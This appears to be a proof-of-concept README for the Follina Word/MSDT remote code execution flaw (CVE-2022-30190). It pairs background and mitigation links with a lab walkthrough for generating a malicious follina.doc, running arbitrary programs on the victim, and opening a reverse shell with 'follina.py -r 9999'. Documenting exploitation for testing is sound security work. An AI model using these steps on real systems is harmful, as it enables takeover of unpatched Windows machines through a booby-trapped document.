CVE-2022-30190 PoC — Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability

Source

Associated Vulnerability

Description

CVE-2022-30190 Proof-Of-Concept

Readme

## CVE?
CVE stands for Common Vulnerabilities and Exposures. In simple terms, it means the assigning of numbers to vulnerabilities or security issues that are found within a computer system or software. The main purpose of CVE is to provide a consistent reference for organizations and users to effectively track and manage their vulnerabilities.

## CVE-2022-30190 _a.k.a_ "Follina"
The security vulnerability named **CVE-2022-30190**, otherwise known as **"Follina"** shocked the cybersecurity community in 2022 because of its potential to spread. This is a vulnerability in Microsoft Office products, particularly in Word, that enables attackers to remotely execute code by just tricking users into opening a specially crafted document. It is, however, very dangerous since it does not depend on the enablement of macros, and that makes blocking of such an attack harder with traditional security measures.

Some sources about the discovery of CVE-2022-30190 :
- [cve.org](https://www.cve.org/CVERecord?id=CVE-2022-30190)
- [nvd.gov](https://nvd.nist.gov/vuln/detail/cve-2022-30190)
- [Medium](https://medium.com/@ajithcrajendran/follina-msdt-cve-2022-30190-aab6575c8224)
- [Wikipedia](https://id.wikipedia.org/wiki/CVE-2022-30190)
- [HackTheBox](https://www.hackthebox.com/blog/cve-2022-30190-follina-explained)

## Mitigation for CVE-2022-30190
Just do a system update by turning on the system update periodically on your Microsoft Windows operating system.

Some resources on how to mitigate CVE-2022-30190 :
- [Microsoft Official Guidance](https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/)
- [SentinelOne](https://www.sentinelone.com/blog/staying-ahead-of-cve-2022-30190-follina/)

## Test Run on Virtual Machine
#### Tools and operating system used :
- Debian 12 as the attacker (host computer)
- Windows 10 build 19044.1288 (running on vm) as the victim
- Virtual Box
#### Things that should be considered :
- The attacks in this experiment were only performed on the same local network
- The attack can be carried out through the outside network, but requires some tinkering
- The attack in this test was carried out with the antivirus disabled on the victim's computer
- The attack can only be carried out on Microsoft Windows operating systems that are old builds or that have not received new security patches since May 30, 2022 including Windows 10 and 11
#### Usage :
Do an update on the attacker's computer (host) which here uses the Debian 12 operating system by using this command
```
$ sudo apt update && sudo apt upgrade -y
```
Install GIT if not already
```
$ sudo apt install git
```
Install Python if not already
```
$ sudo apt install python3
```
Install "netifaces" module for Python3
```
$ sudo apt install python3-netifaces
```
Clone the payload repository created by [John Hammond](https://github.com/JohnHammond/) and move to its directory
```
$ git clone https://github.com/JohnHammond/msdt-follina.git
$ cd msdt-follina
```
Run the payload and move the _**follina.doc**_ file located in the msdt-follina directory to the victim's computer
```
$ python3 follina.py
```
Open the _**follina.doc**_ file on the victim's computer
If the payload is successful, the calculator application will open

To execute other programs you can use the command (here I'm using an example to open the notepad application)
```
$ python3 follina.py -c "notepad.exe"
```

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-36-11.png?raw=true)

To do a reverse shell payload you can simply using this following command 
```
$ python3 follina.py -r 9999
```
If the reverse shell payload is successful, you will directly enter the victim's computer directory and you can do whatever you want on the victim's computer

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-54-07.png?raw=true)

![Screenshot](https://github.com/madbaiu/CVE-2022-30190/blob/main/pic/Screenshot%20from%202024-11-25%2021-44-53.png?raw=true)

## Conclusions
As of July 22, 2022, this vulnerability has been patched by Microsoft, but it does not rule out the possibility that this vulnerability can still have an impact on those who do not regularly update their Windows operating system. Therefore do not forget to always update your operating system to keep cybercriminals from doing their actions, Cheers!

File Snapshot

 [4.0K]  /data/pocs/c3c2212b66eea46a0a672ee41ec84f146be6375a
├── [4.0K]  msdt-follina
│   ├── [4.0K]  doc
│   │   ├── [1.3K]  [Content_Types].xml
│   │   ├── [4.0K]  docProps
│   │   │   ├── [ 704]  app.xml
│   │   │   └── [ 735]  core.xml
│   │   └── [4.0K]  word
│   │       ├── [3.8K]  document.xml
│   │       ├── [1.5K]  fontTable.xml
│   │       ├── [4.0K]  _rels
│   │       │   └── [ 975]  document.xml.rels
│   │       ├── [2.9K]  settings.xml
│   │       ├── [ 29K]  styles.xml
│   │       ├── [4.0K]  theme
│   │       │   └── [6.6K]  theme1.xml
│   │       └── [ 803]  webSettings.xml
│   ├── [ 10K]  follina.doc
│   ├── [5.0K]  follina.py
│   ├── [ 44K]  nc64.exe
│   └── [1.5K]  README.md
├── [4.0K]  pic
│   ├── [ 46K]  Screenshot from 2024-11-25 21-36-11.png
│   ├── [ 44K]  Screenshot from 2024-11-25 21-44-53.png
│   └── [ 97K]  Screenshot from 2024-11-25 21-54-07.png
└── [4.4K]  README.md

7 directories, 18 files

Remarks